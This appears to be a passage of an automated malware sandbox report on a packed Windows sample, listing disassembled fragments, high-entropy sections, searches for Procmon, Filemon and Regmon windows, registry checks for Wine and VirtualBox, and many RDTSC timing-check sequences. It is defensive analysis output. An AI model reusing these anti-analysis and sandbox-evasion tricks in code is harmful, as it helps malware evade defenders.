                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push edx; mov dword ptr [esp], eax0_2_005F1564
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 57975B01h; mov dword ptr [esp], edi0_2_005F15BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push esi; mov dword ptr [esp], 4BBB87A0h0_2_005F15C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ecx; mov dword ptr [esp], ebp0_2_005F161F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebp; mov dword ptr [esp], eax0_2_005F1644
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebx; mov dword ptr [esp], edx0_2_005F16BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push eax; mov dword ptr [esp], 2AFF71EFh0_2_005F170B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebx; mov dword ptr [esp], edx0_2_005F1789
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebp; mov dword ptr [esp], 61F643D7h0_2_005F1795
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push esi; mov dword ptr [esp], edx0_2_005F17C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push edi; mov dword ptr [esp], edx0_2_005F1804
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 56BBC826h; mov dword ptr [esp], esi0_2_005F182B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push esi; mov dword ptr [esp], 00000062h0_2_005F1853
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebp; mov dword ptr [esp], esi0_2_005F18F9
                Source: file.exeStatic PE information: section name: entropy: 7.944720387530333
                Source: file.exeStatic PE information: section name: encvjseq entropy: 7.950828634969012

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB0E5 second address: 5FB0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB0EA second address: 5FB0F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB3D4 second address: 5FB3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB3D8 second address: 5FB3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7174BA6FDEh 0x0000000c jo 00007F7174BA6FD6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD9A8 second address: 5FD9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F7174CEBA88h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push ebx 0x00000026 mov cx, CD00h 0x0000002a pop edx 0x0000002b add esi, 0F027284h 0x00000031 call 00007F7174CEBA89h 0x00000036 pushad 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD9EE second address: 5FD9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD9F4 second address: 5FDA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7174CEBA93h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDA13 second address: 5FDA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDA17 second address: 5FDA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7174CEBA8Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDB1E second address: 5FDB65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7174BA6FD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+122D388Fh] 0x00000011 lea ebx, dword ptr [ebp+1245D883h] 0x00000017 push ecx 0x00000018 jmp 00007F7174BA6FE2h 0x0000001d pop edx 0x0000001e push eax 0x0000001f pushad 0x00000020 jmp 00007F7174BA6FE5h 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDC05 second address: 5FDC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDC0A second address: 5FDC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDC10 second address: 5FDC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDC14 second address: 5FDC18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDDB7 second address: 5FDDCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F75A second address: 60F75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EBFB second address: 61EC08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F7174CEBA86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EC08 second address: 61EC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D1F3 second address: 61D1FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7174CEBA86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D350 second address: 61D36F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174BA6FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D36F second address: 61D373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D373 second address: 61D383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jc 00007F7174BA6FD6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D4E9 second address: 61D4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F7174CEBA86h 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D4F8 second address: 61D500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D500 second address: 61D504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D6A3 second address: 61D6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D91D second address: 61D928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA99 second address: 61DAC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F7174BA6FE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F7174BA6FE2h 0x00000011 jmp 00007F7174BA6FDAh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED553 second address: 5ED55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED55A second address: 5ED593 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7174BA6FF4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007F7174BA6FD6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624357 second address: 62435D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CE5 second address: 622D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623409 second address: 62340F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF03E second address: 5EF044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF044 second address: 5EF048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628EEC second address: 628EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628EF4 second address: 628EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628EF8 second address: 628F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7174BA6FDEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e ja 00007F7174BA6FD6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F12 second address: 628F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007F7174CEBA86h 0x0000000c jmp 00007F7174CEBA8Ah 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E326D second address: 5E3273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3273 second address: 5E3285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F7174CEBA92h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D08E second address: 62D092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D092 second address: 62D096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C493 second address: 62C4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007F7174BA6FD6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C756 second address: 62C768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C768 second address: 62C7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7174BA6FD6h 0x00000009 jp 00007F7174BA6FD6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F7174BA6FE1h 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007F7174BA6FD6h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7174BA6FE0h 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C7AE second address: 62C7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC31 second address: 62CC46 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7174BA6FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnp 00007F7174BA6FD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC46 second address: 62CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA99h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC64 second address: 62CC69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FE1D second address: 62FE37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7174CEBA8Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FE37 second address: 62FE4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FE4C second address: 62FE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F7174CEBA99h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7174CEBA99h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FE9E second address: 62FEA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630338 second address: 630353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630353 second address: 630361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630361 second address: 630365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6305E6 second address: 6305EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6305EC second address: 6305F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630FBD second address: 630FF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F7174BA6FD8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 add esi, 2F6832B4h 0x0000002a push eax 0x0000002b jl 00007F7174BA6FE8h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630FF6 second address: 630FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631DDE second address: 631E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F7174BA6FE7h 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D3169h], ecx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D38C3h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7174BA6FE3h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631E24 second address: 631E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632696 second address: 63269B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63269B second address: 6326A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633C64 second address: 633C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6326A1 second address: 6326A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6326A5 second address: 6326A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634650 second address: 634654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634654 second address: 634662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F7174BA6FD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634662 second address: 634666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634708 second address: 634726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634726 second address: 63472A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6343E1 second address: 6343EB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174BA6FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6350D0 second address: 6350E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F7174CEBA88h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F7174CEBA86h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6343EB second address: 6343F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6343F1 second address: 634404 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7174CEBA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634404 second address: 63440A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63440A second address: 63440E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638736 second address: 63873A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63ABA7 second address: 63AC43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F7174CEBA92h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F7174CEBA88h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov edi, 5BA2F576h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push edi 0x00000040 mov edi, dword ptr [ebp+122D29D0h] 0x00000046 pop ebx 0x00000047 mov eax, dword ptr [ebp+122D1341h] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007F7174CEBA88h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 mov dword ptr [ebp+1248A1FDh], esi 0x0000006d push FFFFFFFFh 0x0000006f mov ebx, dword ptr [ebp+12458675h] 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push ecx 0x00000079 pushad 0x0000007a popad 0x0000007b pop ecx 0x0000007c rdtsc
